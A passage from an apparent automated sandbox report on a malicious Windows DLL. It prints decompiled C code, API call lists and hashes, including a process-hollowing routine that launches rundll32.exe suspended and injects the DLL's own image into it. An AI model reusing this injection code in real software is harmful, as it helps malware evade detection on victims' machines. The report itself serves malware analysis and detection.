											 *((intOrPtr*)(_t98 + 0x18)) = 1;
										}
									}
									_push(0x1e);
									_push(_t98 + 0x24);
									 *((short*)( *((intOrPtr*)(_t98 + 0x1c)) + _t67 - 1)) = 0;
									L6F33C2EE();
									 *((intOrPtr*)(_t98 + 0x28)) = 3;
									 *(_t98 + 0x2c) = _t67;
									 *((short*)(_t98 + 0x34)) = 0x614;
									SHFileOperationA(_t98 + 0x20);
								}
								HeapFree(GetProcessHeap(), 0, _t96);
							}
							goto L23;
						} else {
							return _t36;
						}
					}
				}
			}



































                                                                                                                        0x6f3344d0
                                                                                                                        0x6f3344d0
                                                                                                                        0x6f3344db
                                                                                                                        0x6f3344e3
                                                                                                                        0x6f334749
                                                                                                                        0x6f334751
                                                                                                                        0x6f3344e9
                                                                                                                        0x6f3344e9
                                                                                                                        0x6f3344ee
                                                                                                                        0x6f3344f4
                                                                                                                        0x6f3344ff
                                                                                                                        0x6f334505
                                                                                                                        0x6f33450b
                                                                                                                        0x6f334521
                                                                                                                        0x00000000
                                                                                                                        0x6f334523
                                                                                                                        0x6f334523
                                                                                                                        0x6f33452f
                                                                                                                        0x6f334536
                                                                                                                        0x6f334540
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f334540
                                                                                                                        0x00000000
                                                                                                                        0x6f334511
                                                                                                                        0x6f334515
                                                                                                                        0x6f334546
                                                                                                                        0x6f33455b
                                                                                                                        0x6f33455f
                                                                                                                        0x6f334565
                                                                                                                        0x6f33456b
                                                                                                                        0x6f33456c
                                                                                                                        0x6f334584
                                                                                                                        0x6f334586
                                                                                                                        0x6f334593
                                                                                                                        0x6f334593
                                                                                                                        0x6f3345a5
                                                                                                                        0x6f3345a9
                                                                                                                        0x6f3345ae
                                                                                                                        0x6f3345b3
                                                                                                                        0x6f3345b9
                                                                                                                        0x6f3345c1
                                                                                                                        0x6f3345d3
                                                                                                                        0x6f3345e0
                                                                                                                        0x6f3345e0
                                                                                                                        0x6f3345ec
                                                                                                                        0x6f3345ee
                                                                                                                        0x6f3345f6
                                                                                                                        0x6f3345fa
                                                                                                                        0x6f3345fe
                                                                                                                        0x6f334620
                                                                                                                        0x6f334632
                                                                                                                        0x6f334634
                                                                                                                        0x6f334600
                                                                                                                        0x6f334600
                                                                                                                        0x6f334619
                                                                                                                        0x6f33461b
                                                                                                                        0x6f33461b
                                                                                                                        0x6f334637
                                                                                                                        0x6f33463f
                                                                                                                        0x6f334640
                                                                                                                        0x6f334642
                                                                                                                        0x6f334648
                                                                                                                        0x6f334650
                                                                                                                        0x6f334655
                                                                                                                        0x6f33465a
                                                                                                                        0x6f334667
                                                                                                                        0x6f334669
                                                                                                                        0x6f33467f
                                                                                                                        0x6f334681
                                                                                                                        0x6f334685
                                                                                                                        0x6f334687
                                                                                                                        0x6f334689
                                                                                                                        0x6f33468f
                                                                                                                        0x6f334694
                                                                                                                        0x6f334694
                                                                                                                        0x6f334697
                                                                                                                        0x6f33469d
                                                                                                                        0x6f3346b6
                                                                                                                        0x6f3346be
                                                                                                                        0x6f3346c3
                                                                                                                        0x6f33469f
                                                                                                                        0x6f33469f
                                                                                                                        0x6f3346ac
                                                                                                                        0x6f3346b1
                                                                                                                        0x6f3346b1
                                                                                                                        0x6f3346cb
                                                                                                                        0x6f3346d5
                                                                                                                        0x6f3346d7
                                                                                                                        0x6f3346db
                                                                                                                        0x6f3346e1
                                                                                                                        0x6f3346e6
                                                                                                                        0x6f3346f0
                                                                                                                        0x6f3346f6
                                                                                                                        0x6f3346f6
                                                                                                                        0x6f3346cb
                                                                                                                        0x6f334702
                                                                                                                        0x6f334708
                                                                                                                        0x6f334709
                                                                                                                        0x6f334710
                                                                                                                        0x6f33471f
                                                                                                                        0x6f334727
                                                                                                                        0x6f33472b
                                                                                                                        0x6f334730
                                                                                                                        0x6f334730
                                                                                                                        0x6f334740
                                                                                                                        0x6f334747
                                                                                                                        0x00000000
                                                                                                                        0x6f33451b
                                                                                                                        0x6f33451b
                                                                                                                        0x6f33451b
                                                                                                                        0x6f334515
                                                                                                                        0x6f33450b

                                                                                                                        APIs
                                                                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 6F3344FF
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000800,00000000), ref: 6F33454E
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F334555
                                                                                                                        • wsprintfA.USER32 ref: 6F334584
                                                                                                                        • wsprintfA.USER32 ref: 6F33459F
                                                                                                                        • wsprintfA.USER32 ref: 6F3345D3
                                                                                                                        • wsprintfA.USER32 ref: 6F3345EC
                                                                                                                        • wsprintfA.USER32 ref: 6F334619
                                                                                                                        • wsprintfA.USER32 ref: 6F334632
                                                                                                                        • wsprintfA.USER32 ref: 6F33467F
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00A55CA8,00A55CD8,00000602,00A32D38), ref: 6F3346F0
                                                                                                                        • RtlZeroMemory.NTDLL(?,0000001E), ref: 6F334710
                                                                                                                        • SHFileOperationA.SHELL32(?,?,0000001E), ref: 6F334730
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F334739
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F334740
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$Heap$PrivateProcessProfile$AllocFileFreeMemoryOperationStringWriteZero
                                                                                                                        • String ID: %s "%s%s%s" %s$%s %s$%s%d%c$%s%s%c$%s%s%s$.cab$.exe$.inf$install$remove$restart$vpn
                                                                                                                        • API String ID: 39017707-2794406546
                                                                                                                        • Opcode ID: d6731bb974602088898007bef38cf1fad78e3aab61831aa27a99216430704922
                                                                                                                        • Instruction ID: 0449499d11f6e2f4abee47aa19376abbf9115b9fda9b6db3c8cecfca3460325a
                                                                                                                        • Opcode Fuzzy Hash: d6731bb974602088898007bef38cf1fad78e3aab61831aa27a99216430704922
                                                                                                                        • Instruction Fuzzy Hash: CD61C5B2E043A8BBE710EF64CC45F6B77ADAF85714F01450CF954AB280EA76F4148B65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3323B0, Relevance: 47.4, APIs: 21, Strings: 6, Instructions: 164librarythreadstringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 96%
                                                                                                                        			E6F3323B0() {
				char _v260;
				char _v268;
				char* _v272;
				struct _SECURITY_ATTRIBUTES* _v276;
				struct _SECURITY_ATTRIBUTES* _v280;
				struct _SECURITY_ATTRIBUTES* _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				void* _v296;
				char _v320;
				struct HINSTANCE__* _v324;
				void _v328;
				struct HINSTANCE__* _v332;
				char _v336;
				long _v340;
				char _v344;
				CHAR* _t42;
				int _t50;
				long _t51;
				char* _t53;
				char* _t54;
				void* _t56;
				intOrPtr _t62;
				void* _t65;
				void* _t73;
				void* _t88;
				signed int _t91;
				void* _t92;
				long _t96;
				void* _t97;

				_v328 = LoadLibraryA("msvcrt.dll");
				_v324 = LoadLibraryA("user32.dll");
				_v332 = LoadLibraryA("shlwapi.dll");
				_t42 = GetCommandLineA();
				_v340 = 0;
				_t88 = E6F33A3D0(_t42,  &_v340);
				if(_t88 == 0) {
					L24:
					FreeLibrary(_v324);
					FreeLibrary(_v332);
					FreeLibrary(_v328);
					ExitProcess(0);
				}
				if(_v340 <= 1) {
					L23:
					LocalFree(_t88);
					goto L24;
				} else {
					_t91 = 1;
					do {
						_t50 = lstrcmpiA( *(_t88 + _t91 * 4), "-svcr");
						_t51 = _v340;
						if(_t50 != 0) {
							goto L5;
						}
						_t91 = _t91 + 1;
						if(_t91 < _t51) {
							_t53 = StrRChrA( *(_t88 + _t91 * 4), 0, 0x5c);
							if(_t53 == 0) {
								break;
							}
							_t54 =  &(_t53[1]);
							if(_t54 != 0 &&  *_t54 != 0) {
								wsprintfA( &_v268, "%s%s", "pdll", _t54);
								_t56 = OpenEventA(2, 0,  &_v260);
								if(_t56 != 0) {
									CloseHandle(_t56);
									break;
								}
								_t73 = CreateEventA(0, 1, 0,  &_v260);
								_t96 = 0;
								if(_t73 != 0) {
									_push(0x3c);
									_push( &_v320);
									L6F33C2EE();
									_v344 = 0;
									_t62 = E6F332260( *(_t88 + _t91 * 4),  &_v344);
									if(_t62 != 0) {
										_v292 = _t62;
										_v288 = _v344;
										_v284 = 0;
										_v280 = 0;
										_v276 = 0;
										_v272 =  *(_t88 + _t91 * 4);
										_t92 = CreateThread(0, 0, E6F332340,  &_v328, 0, 0);
										if(_t92 != 0) {
											_t97 = E6F331D00(_v296, _v292, 0,  &_v332);
											if(_v296 != 0) {
												NtTerminateThread(_t92, 0);
												if(_t97 == 0) {
													E6F331C00( &_v336);
												}
											}
											CloseHandle(_t92);
											_t96 = 0;
										}
										_t65 = _v296;
										if(_t65 != _t96) {
											VirtualFree(_t65, _t96, 0x8000);
										}
									}
								}
								CloseHandle(_t73);
							}
							break;
						}
						L5:
						_t91 = _t91 + 1;
					} while (_t91 < _t51);
					goto L23;
				}
			}

































                                                                                                                        0x6f3323ca
                                                                                                                        0x6f3323d5
                                                                                                                        0x6f3323db
                                                                                                                        0x6f3323df
                                                                                                                        0x6f3323eb
                                                                                                                        0x6f3323f8
                                                                                                                        0x6f3323ff
                                                                                                                        0x6f332589
                                                                                                                        0x6f332594
                                                                                                                        0x6f33259b
                                                                                                                        0x6f3325a2
                                                                                                                        0x6f3325a6
                                                                                                                        0x6f3325a6
                                                                                                                        0x6f33240c
                                                                                                                        0x6f332582
                                                                                                                        0x6f332583
                                                                                                                        0x00000000
                                                                                                                        0x6f332412
                                                                                                                        0x6f332419
                                                                                                                        0x6f332420
                                                                                                                        0x6f332429
                                                                                                                        0x6f33242d
                                                                                                                        0x6f332431
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f332433
                                                                                                                        0x6f332436
                                                                                                                        0x6f33244a
                                                                                                                        0x6f332452
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f332458
                                                                                                                        0x6f332459
                                                                                                                        0x6f332478
                                                                                                                        0x6f33248a
                                                                                                                        0x6f332492
                                                                                                                        0x6f33257b
                                                                                                                        0x00000000
                                                                                                                        0x6f33257b
                                                                                                                        0x6f3324aa
                                                                                                                        0x6f3324ac
                                                                                                                        0x6f3324b0
                                                                                                                        0x6f3324b6
                                                                                                                        0x6f3324bc
                                                                                                                        0x6f3324bd
                                                                                                                        0x6f3324cb
                                                                                                                        0x6f3324cf
                                                                                                                        0x6f3324d9
                                                                                                                        0x6f3324e8
                                                                                                                        0x6f3324f8
                                                                                                                        0x6f3324fc
                                                                                                                        0x6f332500
                                                                                                                        0x6f332504
                                                                                                                        0x6f332508
                                                                                                                        0x6f332512
                                                                                                                        0x6f332516
                                                                                                                        0x6f332535
                                                                                                                        0x6f332537
                                                                                                                        0x6f33253c
                                                                                                                        0x6f332543
                                                                                                                        0x6f33254a
                                                                                                                        0x6f33254f
                                                                                                                        0x6f332543
                                                                                                                        0x6f332553
                                                                                                                        0x6f332559
                                                                                                                        0x6f332559
                                                                                                                        0x6f33255b
                                                                                                                        0x6f332561
                                                                                                                        0x6f33256a
                                                                                                                        0x6f33256a
                                                                                                                        0x6f332561
                                                                                                                        0x6f3324d9
                                                                                                                        0x6f332571
                                                                                                                        0x6f332577
                                                                                                                        0x00000000
                                                                                                                        0x6f332459
                                                                                                                        0x6f332438
                                                                                                                        0x6f332438
                                                                                                                        0x6f332439
                                                                                                                        0x00000000
                                                                                                                        0x6f332581

                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(msvcrt.dll), ref: 6F3323C3
                                                                                                                        • LoadLibraryA.KERNEL32(user32.dll), ref: 6F3323CE
                                                                                                                        • LoadLibraryA.KERNEL32(shlwapi.dll), ref: 6F3323D9
                                                                                                                        • GetCommandLineA.KERNEL32 ref: 6F3323DF
                                                                                                                          • Part of subcall function 6F33A3D0: lstrlenA.KERNEL32(?,?,?,?,00000000,?), ref: 6F33A3DB
                                                                                                                          • Part of subcall function 6F33A3D0: LocalAlloc.KERNEL32(00000040,00000004,?,?,?,00000000,?), ref: 6F33A3F4
                                                                                                                        • lstrcmpiA.KERNEL32(?,-svcr), ref: 6F332429
                                                                                                                        • StrRChrA.SHLWAPI(?,00000000,0000005C,?,-svcr), ref: 6F33244A
                                                                                                                        • wsprintfA.USER32 ref: 6F332478
                                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,?), ref: 6F33248A
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 6F3324A4
                                                                                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 6F3324BD
                                                                                                                        • CreateThread.KERNEL32 ref: 6F33250C
                                                                                                                        • NtTerminateThread.NTDLL ref: 6F33253C
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F332553
                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 6F33256A
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F332571
                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 6F332583
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 6F332594
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 6F33259B
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 6F3325A2
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F3325A6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$Free$Load$CloseCreateEventHandleLocalThread$AllocCommandExitLineMemoryOpenProcessTerminateVirtualZerolstrcmpilstrlenwsprintf
                                                                                                                        • String ID: %s%s$-svcr$msvcrt.dll$pdll$shlwapi.dll$user32.dll
                                                                                                                        • API String ID: 4122922002-3260842094
                                                                                                                        • Opcode ID: ba3dd78bd3816c3261faafbb08f3ce6c4237d4eea5135c99e6d5a31c64f96b60
                                                                                                                        • Instruction ID: 3b1e1d5bb70e5227133ba15b556a6e46b90200c1490a516523f2600940f2b47e
                                                                                                                        • Opcode Fuzzy Hash: ba3dd78bd3816c3261faafbb08f3ce6c4237d4eea5135c99e6d5a31c64f96b60
                                                                                                                        • Instruction Fuzzy Hash: E951CF73D047A9ABE710DFA8CD44F5BBBEDAB85714F00490DF95192240DB71E9108BA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F332750, Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 115memorynativethreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 74%
                                                                                                                        			E6F332750(CHAR* _a4) {
				intOrPtr _v552;
				struct _CONTEXT _v724;
				struct _STARTUPINFOA _v792;
				struct _PROCESS_INFORMATION _v808;
				void* _v812;
				void* _v816;
				char _t23;
				long* _t38;
				CHAR* _t51;
				void* _t52;
				void* _t55;

				_t51 = _a4;
				_t38 = 0;
				if(GetFileAttributesA(_t51) == 0xffffffff) {
					return 0;
				} else {
					_t55 = HeapAlloc(GetProcessHeap(), 8, 0x30c);
					if(_t55 != 0) {
						_t23 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa4de08
						wsprintfA(_t55, "\"%s%s\" %s \"%s\"", _t23, "rundll32.exe", "-svcr", _t51);
						_push(0x44);
						_push( &(_v792.dwX));
						L6F33C2EE();
						_push(0x10);
						_push( &(_v808.dwProcessId));
						_v792.lpDesktop = 0x44;
						L6F33C2EE();
						if(CreateProcessA(0, _t55, 0, 0, 0, 4, 0, 0,  &_v792,  &_v808) != 0) {
							_push(_v808.hProcess);
							_t52 = E6F332640();
							if(_t52 == 0) {
								L8:
								_push(0);
								_push(_v808.hProcess);
								L6F33C30C();
							} else {
								_v724 = 0x10002;
								if(NtGetContextThread(_v808.hThread,  &_v724) < 0) {
									goto L8;
								} else {
									_v552 = E6F3323B0 - "embly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" + _t52;
									if(NtSetContextThread(_v808,  &(_v792.hStdError)) < 0 || NtResumeThread(_v812, 0) < 0) {
										goto L8;
									} else {
										_t38 = 1;
									}
								}
							}
							CloseHandle(_v812);
							CloseHandle(_v816);
						}
						HeapFree(GetProcessHeap(), 0, _t55);
					}
					return _t38;
				}
			}














                                                                                                                        0x6f332758
                                                                                                                        0x6f332760
                                                                                                                        0x6f33276b
                                                                                                                        0x6f3328a2
                                                                                                                        0x6f332771
                                                                                                                        0x6f332789
                                                                                                                        0x6f33278d
                                                                                                                        0x6f332793
                                                                                                                        0x6f3327aa
                                                                                                                        0x6f3327b3
                                                                                                                        0x6f3327b9
                                                                                                                        0x6f3327ba
                                                                                                                        0x6f3327bf
                                                                                                                        0x6f3327c5
                                                                                                                        0x6f3327c6
                                                                                                                        0x6f3327ce
                                                                                                                        0x6f3327ee
                                                                                                                        0x6f3327f8
                                                                                                                        0x6f3327fe
                                                                                                                        0x6f332805
                                                                                                                        0x6f33285f
                                                                                                                        0x6f332863
                                                                                                                        0x6f332865
                                                                                                                        0x6f332866
                                                                                                                        0x6f332807
                                                                                                                        0x6f332811
                                                                                                                        0x6f332820
                                                                                                                        0x00000000
                                                                                                                        0x6f332822
                                                                                                                        0x6f332839
                                                                                                                        0x6f332847
                                                                                                                        0x00000000
                                                                                                                        0x6f332858
                                                                                                                        0x6f332858
                                                                                                                        0x6f332858
                                                                                                                        0x6f332847
                                                                                                                        0x6f332820
                                                                                                                        0x6f332876
                                                                                                                        0x6f33287d
                                                                                                                        0x6f33287d
                                                                                                                        0x6f332885
                                                                                                                        0x6f332885
                                                                                                                        0x6f332897
                                                                                                                        0x6f332897

                                                                                                                        APIs
                                                                                                                        • GetFileAttributesA.KERNEL32(?,00000000,?), ref: 6F332762
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000030C,00000000,00000000), ref: 6F332780
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F332783
                                                                                                                        • wsprintfA.USER32 ref: 6F3327AA
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000044), ref: 6F3327BA
                                                                                                                        • RtlZeroMemory.NTDLL ref: 6F3327CE
                                                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 6F3327E6
                                                                                                                        • NtGetContextThread.NTDLL ref: 6F332819
                                                                                                                        • NtSetContextThread.NTDLL ref: 6F332840
                                                                                                                        • NtResumeThread.NTDLL ref: 6F33284F
                                                                                                                        • NtTerminateProcess.NTDLL(?,00000000), ref: 6F332866
                                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,00000044), ref: 6F332876
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6F33287D
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F332882
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F332885
                                                                                                                          • Part of subcall function 6F332640: RtlZeroMemory.NTDLL(?,00000008), ref: 6F332669
                                                                                                                          • Part of subcall function 6F332640: NtCreateSection.NTDLL ref: 6F33268B
                                                                                                                          • Part of subcall function 6F332640: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 6F3326B9
                                                                                                                          • Part of subcall function 6F332640: NtMapViewOfSection.NTDLL(08000000,00000000,0000000E,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 6F3326E2
                                                                                                                          • Part of subcall function 6F332640: RtlMoveMemory.NTDLL(?,6F330000,?), ref: 6F3326F6
                                                                                                                          • Part of subcall function 6F332640: NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 6F33272D
                                                                                                                          • Part of subcall function 6F332640: NtClose.NTDLL(?), ref: 6F332737
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapMemoryProcessSection$CloseThreadViewZero$ContextCreateHandle$AllocAttributesFileFreeMoveResumeTerminateUnmapwsprintf
                                                                                                                        • String ID: "%s%s" %s "%s"$-svcr$D$rundll32.exe
                                                                                                                        • API String ID: 4033018722-303510360
                                                                                                                        • Opcode ID: 92f4d49c012db22edef1ad7d4f11e4aa50548f4ff62a9521053413942993a488
                                                                                                                        • Instruction ID: ab8fbcfaaba371c1cfa2fd055eaa8892908f670feda343a685b42d24368fb71a
                                                                                                                        • Opcode Fuzzy Hash: 92f4d49c012db22edef1ad7d4f11e4aa50548f4ff62a9521053413942993a488
                                                                                                                        • Instruction Fuzzy Hash: B431E5B3A043A96BD310DB65CD80E6BB7DDEBC5768F00091CFA5496280C778D90987B2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F334EF0, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 81processnativesynchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 73%
                                                                                                                        			E6F334EF0(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
				DWORD* _v0;
				signed int _v4;
				signed int _v8;
				CHAR* _v12;
				struct _STARTUPINFOA _v84;
				char _v92;
				void* _v96;
				void* _v100;
				signed int _t17;
				signed int _t23;
				long _t27;
				DWORD* _t30;
				intOrPtr _t33;
				struct _PROCESS_INFORMATION* _t44;

				_t44 =  &_v84;
				_push(0x44);
				_push( &(_v84.dwX));
				L6F33C2EE();
				_push(0x10);
				_push( &_v92);
				L6F33C2EE();
				_t17 = _v8;
				_v84.cb = 0x44;
				if(_t17 == 0) {
					_v84.dwFlags = 1;
				}
				_t33 = _a12;
				if(_t33 != 0) {
					_v84.lpDesktop = _t33;
				}
				asm("sbb eax, eax");
				if(CreateProcessA(0, _v12, 0, 0, 0,  ~_t17 & 0x08000000, 0, _a8,  &_v84, _t44) == 0) {
					return 0;
				} else {
					_t23 = _v4;
					if(_t23 != 0) {
						if(_t23 == 0xffffffff) {
							_t27 = _t23 | 0xffffffff;
						} else {
							_t27 = _t23 * 0x3e8;
						}
						if(WaitForSingleObject(_v100, _t27) != 0) {
							if(_a4 != 0) {
								_push(0);
								_push(_v100);
								L6F33C30C();
							}
						} else {
							_t30 = _v0;
							if(_t30 != 0) {
								GetExitCodeProcess(_v100, _t30);
							}
						}
					}
					CloseHandle(_v96);
					CloseHandle(_v100);
					return 1;
				}
			}

















                                                                                                                        0x6f334ef0
                                                                                                                        0x6f334ef3
                                                                                                                        0x6f334ef9
                                                                                                                        0x6f334efa
                                                                                                                        0x6f334eff
                                                                                                                        0x6f334f05
                                                                                                                        0x6f334f06
                                                                                                                        0x6f334f0b
                                                                                                                        0x6f334f0f
                                                                                                                        0x6f334f19
                                                                                                                        0x6f334f1b
                                                                                                                        0x6f334f1b
                                                                                                                        0x6f334f23
                                                                                                                        0x6f334f29
                                                                                                                        0x6f334f2b
                                                                                                                        0x6f334f2b
                                                                                                                        0x6f334f41
                                                                                                                        0x6f334f5e
                                                                                                                        0x6f334fd2
                                                                                                                        0x6f334f60
                                                                                                                        0x6f334f60
                                                                                                                        0x6f334f66
                                                                                                                        0x6f334f6b
                                                                                                                        0x6f334f75
                                                                                                                        0x6f334f6d
                                                                                                                        0x6f334f6d
                                                                                                                        0x6f334f6d
                                                                                                                        0x6f334f85
                                                                                                                        0x6f334fa1
                                                                                                                        0x6f334fa6
                                                                                                                        0x6f334fa8
                                                                                                                        0x6f334fa9
                                                                                                                        0x6f334fa9
                                                                                                                        0x6f334f87
                                                                                                                        0x6f334f87
                                                                                                                        0x6f334f8d
                                                                                                                        0x6f334f94
                                                                                                                        0x6f334f94
                                                                                                                        0x6f334f8d
                                                                                                                        0x6f334f85
                                                                                                                        0x6f334fba
                                                                                                                        0x6f334fc1
                                                                                                                        0x6f334fcc
                                                                                                                        0x6f334fcc

                                                                                                                        APIs
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000044), ref: 6F334EFA
                                                                                                                        • RtlZeroMemory.NTDLL(00000044,00000010), ref: 6F334F06
                                                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,?), ref: 6F334F56
                                                                                                                        • WaitForSingleObject.KERNEL32(?,?), ref: 6F334F7D
                                                                                                                        • GetExitCodeProcess.KERNEL32 ref: 6F334F94
                                                                                                                        • NtTerminateProcess.NTDLL(00000000,00000000), ref: 6F334FA9
                                                                                                                        • CloseHandle.KERNEL32(00000044,770CC740), ref: 6F334FBA
                                                                                                                        • CloseHandle.KERNEL32(00000044), ref: 6F334FC1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseHandleMemoryZero$CodeCreateExitObjectSingleTerminateWait
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 2123967418-2746444292
                                                                                                                        • Opcode ID: 1c6ec34be75abdd9849f1e6a5a3d158d07c0fbc19b670bdfa033a27e5f27ee90
                                                                                                                        • Instruction ID: 1f66655607f68f2d6858a68d12e090dfd645e0519f7c0ebd8c6f870ef632578d
